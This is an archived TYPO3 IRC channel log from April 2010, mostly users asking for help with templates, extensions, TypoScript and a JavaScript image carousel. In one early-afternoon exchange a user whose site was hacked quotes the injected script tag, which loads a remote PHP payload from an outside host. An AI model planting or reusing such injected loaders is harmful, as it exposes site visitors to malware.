Search the website and IRC logs

#TYPO3 IRC log from : Friday 30 April 2010

Year: 2007 2008 2009 2010 2011 2012
Month: Jan Feb Mar Apr May Jun Jul Sep Oct Nov Dec
Day: 4 5 8 9 10 11 12 13 14 15 16 17 18 19 22 23 24 25 26 27 28 29 30
00:07 Amr0d someone here who can tell me whats wrong with my typo3? I can't login to the Install Tool because after pressing the login button the browser returns me to the login again, and again. Can't get pass the login window :(
00:40 Kurrija Good evening everyone .. anybody here who could give me a hand with an extension (rgsmoothgallery)
01:25 Amr0d Is Imagemagick a must have for Typo3?
08:54 maholtz|WORK good morning :)
08:56 psychomieze-work good morning
10:18 `KGusak sb
10:25 Prot0 sb?
10:35 IngoRenner sorry for the disruption on #typo3-bugday... working on it
10:40 IngoRenner #typo3-bugday is working again, sorry for the disruption
10:42 snoy_ms I have a problem with the extension tx_sremailsubscribe. It doesnt sent html mails. I think the option "enableHTML" doesnt work for me. Any idea how to debug that ?
10:42 snoy_ms it just sent plain text.
11:00 teppi|work snoy_ms, iirc there was also a flag at each user which defines if a html mail is sent to him .. maybe this is set to 0 ?
11:00 teppi|work just an idea ..
11:34 snoy_ms teppi|work: i take a look
11:36 snoy_ms teppi|work: yeahh :-)
11:36 teppi|work :-)
11:36 snoy_ms teppi|work: thats it. i forgot the flag within the newsletter form -> result was the missing flag.....lol
11:36 snoy_ms thx
11:36 snoy_ms afk.....cu
13:03 zed_devil hi there - my typo3 page semms to be hacked, there ist an script code on the end of my source code http://paste.phlogi.net/-71bde319e5/ what can i do - need help
13:05 zed_devil when i inspect the page with firebug i can see that: <script src="http://myfeedsite.info:8080/google.com/dell.com/nasza-klasa.pl.php" defer=""></script>
13:42 yareckon hi guys!
13:47 anteatersa hi!
13:57 ironm Hi SargoDarya :-)
13:58 ds|DaHaiz hi
13:58 ironm hi ds|DaHaiz .. did we speag yesterday? ... did you solve you performance issue?
13:58 ironm speak ..
13:59 ds|DaHaiz ironm, yes we were talking yesterday :)
13:59 ds|DaHaiz i'm not sure if i could solve the problem
13:59 ds|DaHaiz i checked the configuration in the install tool and tried to execute those few image processing tests
13:59 ironm if you like I could install "your" extension, make the same setting as you and tell you how long my test server (ThinkPad T61p) will need ..
14:00 ds|DaHaiz first they all failed because imagemagick seemed to be disabled
14:00 ds|DaHaiz i tried a lot and made that tests working
14:00 ds|DaHaiz it seems that the extension is now pretty fast as it should be
14:00 ironm ok
14:00 yareckon Is there a function in the db library to read the values of extension tables that use the checkbox array storage method?
14:01 yareckon (storing checkbox state as a bitmask)
14:01 ds|DaHaiz let's look if the speed of the extension stays this way
14:01 ds|DaHaiz but now i've got another question
14:02 ds|DaHaiz I've got a footmenu with imprint, contanct and stuff like that
14:02 ds|DaHaiz currently i'm creating a menu in typoscript which works fine
14:02 ds|DaHaiz but i'd like to set the elements of this footmenu with typo3. so a simple be user can also change the links in it
14:03 ds|DaHaiz that, i think, would'nt be a problem, but i would have to set the link on every subpage
14:04 ds|DaHaiz is it possible to inherit specific content elements from the parent page or the parents parent page?
14:04 ironm child or parents ?
14:05 ds|DaHaiz child or parents of what?
14:06 ironm I can't follow your question quite .. @ ds|DaHaiz
14:06 ds|DaHaiz let's say we have one page and this page has a subpage
14:07 ds|DaHaiz both have got the same template object or at least the same data structure for the template
14:07 ds|DaHaiz now i want to set on the parent page a content element.
14:07 ds|DaHaiz this should have the same value in each subpage
14:08 ds|DaHaiz is it possible to tell a content element in the subpage that i should inherit the content of the corresponding content element of its parent page?
14:08 ironm lolli: after changing "ereg_replace" to "preg_replace" incl. curly brackets {} in the sr_feuser_register and sr_freecap php 5.3 code the all is working as expected .. I had somewhere a bug in the TS configuration ...
14:08 ironm no idea ds|DaHaiz
14:09 ds|DaHaiz okay, anyone else here? :)
14:09 ironm s/the all/all/ # ;-) @ lolli
14:11 ds|DaHaiz ive got one more question
14:11 ds|DaHaiz is it possible to connect a ts snippet to one specific page?
14:12 ds|DaHaiz (apart form conditions)
14:12 ds|DaHaiz *from
14:13 ds|DaHaiz (i want to change a setting of a plugin for just one page)
14:13 SargoDarya hi ironm
14:13 ironm something like the following line in the TS setup of this page? @ ds|DaHaiz
14:13 ironm <INCLUDE_TYPOSCRIPT: source="FILE: fileadmin/staticTS/setup_felogin.txt">
14:14 ds|DaHaiz ironm, plain ts in this ts setup field doesnt work, does it? ive tried this yesterday but it didnt do
14:15 ironm ds|DaHaiz: if you "clean" the settings of the root template it should work
14:15 ironm however I didn't test it myself ds|DaHaiz
14:16 ds|DaHaiz the root template didnt contain settings which would had to be overwritten
14:17 ironm do you mean the "local" TS setup of this page doesn't work ds|DaHaiz ?
14:20 ds|DaHaiz i mean the TSconfig field in the page properties
14:32 ironm have you activated the "stop page tree" checkbox on this page ds|DaHaiz ?
14:33 ds|DaHaiz where is that checkbox?
14:35 ironm ds|DaHaiz: List -> "your page" -> options (below TSconfig)
14:37 ironm ds|DaHaiz: incl. Edit of course ...
14:39 ds|DaHaiz this checkbox is not checked, but i cant't get the clue how this checkbox could help?
15:30 yareckon basically how can I make a displayCond (in TCA.php) dependent on the value of checkbox arrays?
15:42 yareckon i.e. 'displayCond' => 'FIELD:mycheckboxarray (item here):=checked'
16:14 FloLeBlanc hi all
16:14 FloLeBlanc anyone experienced with indexed_search?
16:20 kotelette Hi all! A short question: can i prevent tslib_cObj-> getTypoLink_URL from removing trailing slashes in external URLs
16:31 TheEternalAbyss hi....having a template issue in typo3
16:32 TheEternalAbyss I created a template and I've included header info, but it keeps adding a set of directories before all my includes for .js and .css files
16:32 TheEternalAbyss essentially screwing up my css and js links causing my code to not find those files and therefore not running properly
16:32 TheEternalAbyss can anyone help?
16:33 Abu_Amama Hi!
16:34 Abu_Amama TemplaVoila ERROR:
16:34 Abu_Amama Couldn't find a Data Structure set for table/row "pages:1".
16:34 Abu_Amama Please select a Data Structure and Template Object first.
16:34 Abu_Amama what's this?
16:38 TheEternalAbyss you need to have a datastructure and Template object file for every template you have
16:39 TheEternalAbyss what are you trying to do
16:39 TheEternalAbyss i've been dealign with templavoila
16:39 TheEternalAbyss dealing*
16:44 TheEternalAbyss Can someone tell me why typo3/templavoila is adding "fileadmin/sys/html" before all my header objects I've mapped, essentially screwing up my file references?
16:50 yareckon hi guys, wondered what extension or functions I need to look into for returning search results filtered by certain databasefields in typo3?
16:57 Abu_Amama "you need to have a datastructure and Template object file for every template you have"
16:57 Abu_Amama where to do this?
16:57 TheEternalAbyss if you click on templavoila
16:58 TheEternalAbyss it shows you how many templates you have
16:58 TheEternalAbyss how many do you have?
16:58 Abu_Amama 2
16:58 Abu_Amama i think
16:59 Abu_Amama in the right side
16:59 TheEternalAbyss you have a line that says something like this?
16:59 TheEternalAbyss Page header Data Structures: Template Objects:
16:59 TheEternalAbyss /Templates/ 11 11
16:59 TheEternalAbyss ?
17:00 Abu_Amama \System\Templavoila\ 17 18
17:00 TheEternalAbyss when you click templavoila under WEB stuff?
17:00 TheEternalAbyss ok if you click on that it'll list them all for you
17:00 Abu_Amama and \System\Templavoila new...\ 5 5
17:00 anteatersa I have created a special field in tca.php, but now I need to current record uid available, how can I get it from $PA or $fObj?
17:00 Abu_Amama so what have i to do next?
17:01 TheEternalAbyss ok well I'm not sure how your site templates are organized
17:01 Abu_Amama me too :)
17:01 TheEternalAbyss hehehe
17:01 Abu_Amama i'm pure newbie
17:01 TheEternalAbyss but if you click on System\Templavoila or the other one
17:01 TheEternalAbyss you should have a list of your data structures and template objects
17:01 TheEternalAbyss you know what they are?
17:02 TheEternalAbyss if ur a pure noob I can give you a brief breakdown
17:02 Abu_Amama let me explain
17:02 TheEternalAbyss k
17:03 Abu_Amama i ve recieved a copy of o typo3 site whitout typo3 source files
17:03 Abu_Amama the original site runs on linux system
17:03 Abu_Amama i try to run it on wamp under windows
17:03 TheEternalAbyss do you have the database as well?
17:03 Abu_Amama so i put my the copy under www
17:03 Abu_Amama of course
17:03 TheEternalAbyss ok good :P
17:04 Abu_Amama create the database using a dump, but i did not use the data of cache_... tables
17:04 Abu_Amama after that i got the source files of typo 4.2.8
17:05 TheEternalAbyss ok
17:05 Abu_Amama put then under www too
17:05 Abu_Amama run the install tool and run database analysier
17:05 Abu_Amama the backend is runing well
17:05 Abu_Amama i reinstall all the extensions (i found this on the internet)
17:05 TheEternalAbyss do you see your website tree?
17:05 Abu_Amama yes
17:06 TheEternalAbyss ok good
17:06 Abu_Amama but in the front end i have some sql warning and the templavoila error
17:06 TheEternalAbyss what's te sql warning
17:06 TheEternalAbyss the*
17:07 Abu_Amama Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\elearning\t3lib\class.t3lib_db.php on line ....
17:07 Abu_Amama many lines numbers
17:08 Abu_Amama it s a local server
17:10 TheEternalAbyss hmm
17:12 TheEternalAbyss well I'm not sure about the db issue
17:12 Abu_Amama in a linux server i have a blank page ;)
17:12 TheEternalAbyss :)
17:12 Abu_Amama and i can not access the BE :)
17:13 TheEternalAbyss you can't access the backend?
17:13 Abu_Amama on linux
17:13 TheEternalAbyss oh
17:13 Abu_Amama i try over two server s:)
17:13 TheEternalAbyss yea i dunno
17:13 Abu_Amama both are not runing :)
17:14 TheEternalAbyss but if you about templavoila
17:14 TheEternalAbyss sorry i mean
17:14 TheEternalAbyss about templavoila
17:14 Abu_Amama yes
17:14 Abu_Amama but i have a question
17:14 TheEternalAbyss ok ask
17:14 TheEternalAbyss :)
17:15 Abu_Amama because it a dump of a runing site, i think i don't have to touch any think just put every think in place , update localconf et voilà :)
17:15 Abu_Amama isn't it?
17:17 TheEternalAbyss sort of yea
17:18 TheEternalAbyss depends on what version of typo3 they had running and what version you are running and if the db is correctly dumped along with templates and data structures
17:18 TheEternalAbyss but for the most part
17:18 TheEternalAbyss if you have a complete site,w ith db and templates
17:18 TheEternalAbyss copyign it over should work
17:19 Abu_Amama they said they gave me every thing
17:19 scrieler fine weekend to u (=
17:19 Abu_Amama they also dumped cached tables wich made the dumlp file too large
17:19 Abu_Amama :)
17:19 Abu_Amama ok may i ask?
17:20 Abu_Amama you know, can't it be due to some encoding pb between linux and windows :)
17:20 Abu_Amama in the dump file o r some internal file in the site?
17:23 TheEternalAbyss well...
17:23 TheEternalAbyss maybe....but honestly
17:23 TheEternalAbyss i dont think so
17:24 TheEternalAbyss I had a dump of an entire typo3 site
17:24 TheEternalAbyss which was on windows
17:24 TheEternalAbyss i ran it locally on windows, transferred it to a linux host and now I have a local copy on my Mac
17:25 TheEternalAbyss i edit it on my mac, upload it to linux server and it all runs
17:25 TheEternalAbyss so I don't think that's the issue
17:25 anteatersa I have created a special field in tca.php, but now I need to current record uid available, how can I get it from $PA or $fObj?
17:26 anteatersa answer: available in $PA array like so: $PA['row']['uid']
17:26 anteatersa is their a log of this irc channel anywhere?
17:26 Prot0 evening
17:26 Prot0 yes
17:26 anteatersa hi
17:27 Prot0 its on ries's website
17:27 Prot0 http://www.rvantwisk.nl/typo3-irc-log.html
17:28 ries or http://tinyurl.com/log2010
17:29 Prot0 =)
17:29 TheEternalAbyss Prot0 or ries, you know any reason why a script loaded in my template can not find images even though the dir is correct? (i'll paste link one sec)
17:29 TheEternalAbyss http://chriscastiglione.com/index.php?id=273
17:30 TheEternalAbyss if you click on an image in the carousel
17:30 TheEternalAbyss it tries to load lightbox script
17:30 TheEternalAbyss the directories, references and everything are correct
17:30 ries TheEternalAbyss: I don't see a carousell
17:31 Prot0 its in the top
17:31 TheEternalAbyss .......you don't see spinning images?
17:31 TheEternalAbyss turn flash on lol
17:31 Prot0 why on earth would you use flash for that
17:31 Prot0 hehe
17:31 TheEternalAbyss my bosses want it
17:31 Prot0 its annoying to click on anyways
17:32 TheEternalAbyss well I can adjust it to make it less annoying
17:32 Prot0 lol
17:32 TheEternalAbyss i just need it to work for now
17:32 TheEternalAbyss tweaking can come later
17:32 TheEternalAbyss 0=)
17:32 TheEternalAbyss but if you click on an image it partially does what it's supposed to do
17:32 Prot0 im guessing the images are loaded in some kind of XML?
17:32 Prot0 *from
17:32 TheEternalAbyss yup
17:33 Prot0 wheres that located, do you have a link for ti?
17:33 TheEternalAbyss but the frame surrounding the clicked image is referenced in the script itself
17:34 anteatersa thanks prot0
17:34 Prot0 yw :-)
17:34 TheEternalAbyss http://chriscastiglione.com/images/big/01.jpg
17:34 TheEternalAbyss here's the large image that's supposed to load
17:34 TheEternalAbyss and also
17:35 Prot0 TheEternalAbyss: your page gives 3 js errors
17:35 Prot0 think that would be a good thing to start with
17:35 TheEternalAbyss http://chriscastiglione.com/images/close.gif
17:35 TheEternalAbyss 3 js errors...?
17:35 Prot0 yes
17:35 anteatersa nice cat
17:36 TheEternalAbyss lol
17:36 Prot0 lol
17:36 TheEternalAbyss came with the carousel
17:36 TheEternalAbyss but thanks anyways :P
17:36 TheEternalAbyss Prot, where'd you see those?
17:36 TheEternalAbyss i mean how can I see those
17:37 anteatersa you got firefox?
17:37 anteatersa tools -> error console
17:38 anteatersa or better use an extension like firebug
17:38 animan hi
17:38 Prot0 hello
17:39 TheEternalAbyss ok i see them
17:39 TheEternalAbyss hmm
17:39 animan is there an easy way to make tt_news LIST images clickable (to enlarge)?
17:39 TheEternalAbyss ok 2 errors are known already and don't have anything to do with the gallery
17:39 TheEternalAbyss i see where my problem is tho.....
17:39 TheEternalAbyss no wait
17:40 Prot0 no but they can screw up any other js functionality
17:41 crubb hey guys
17:41 anteatersa animan: you could copy the click enlarge typoscript from the single view image onto the list view image
17:41 crubb can anyone give me a hint how to implement a HMENU Pagebrowser like this in typoscript: < << 1 2 3 4 ... 10 11 12 > >> ?
17:41 TheEternalAbyss those scripts have nothing to do with the carousel
17:41 crubb I don't even know what to google ;)
17:41 anteatersa animan: uhm, presuming you were reffering to tt_news
17:42 TheEternalAbyss in fact I can even remove them (except one)
17:46 animan tt_news, yes :) thanks, it works. now all i need is to change pmkshadowbox TS to open LIST view images in it as well
17:46 TheEternalAbyss well I removed those two scripts cause i actually wasn't using them anymore
17:47 TheEternalAbyss but I still don't get my images
17:47 TheEternalAbyss :(
17:50 Prot0 TheEternalAbyss: if i would have to guess the path for the images inside the XML is relative
17:51 TheEternalAbyss yea they are
17:51 TheEternalAbyss i see an error tho
17:51 TheEternalAbyss elementLink is null
17:54 animan hmm.. for some reason it doesn't want to open that LIST image in pmkshadowbox :/
17:54 animan any ideas?
17:57 Prot0 TheEternalAbyss: if they are relative to your root then they wont work in a subdir/path
17:57 TheEternalAbyss but the page it loads from isn't in the subdir
17:57 Prot0 can you put the full image url in the xml just to test
17:57 TheEternalAbyss yea i could
17:57 TheEternalAbyss but i think my problem is it's not connecting the id to the image
18:07 animan anyone?
19:24 TheEternalAbyss HAHAHAHAHA figured my problem out
19:24 TheEternalAbyss :D
19:59 snoy_ms I need some help with extension dev. How to use the autoloader for classes ?
19:59 snoy_ms i use extbase
21:58 crubb hey guys, sorry to repeat myself, but ..
21:58 crubb can anyone give me a hint how to implement a TMENU Pagebrowser like this in typoscript: < << 1 2 3 4 ... 10 11 12 > >> ?
22:38 jjulian hi is there a way in ext:base to change page title? the page is not cached so GLOBALS TSFE ->page['title'] no working

Technologies


R. van Twisk 2004-2010 R. van Twisk / Avenida Diego de Almagro No: 22-47 y Juan Severino / Quito Ecuador
callto://r.vanTwisk | Support: +1 (803) 4263350

© 2012 R. van Twisk. All Rights Reserved.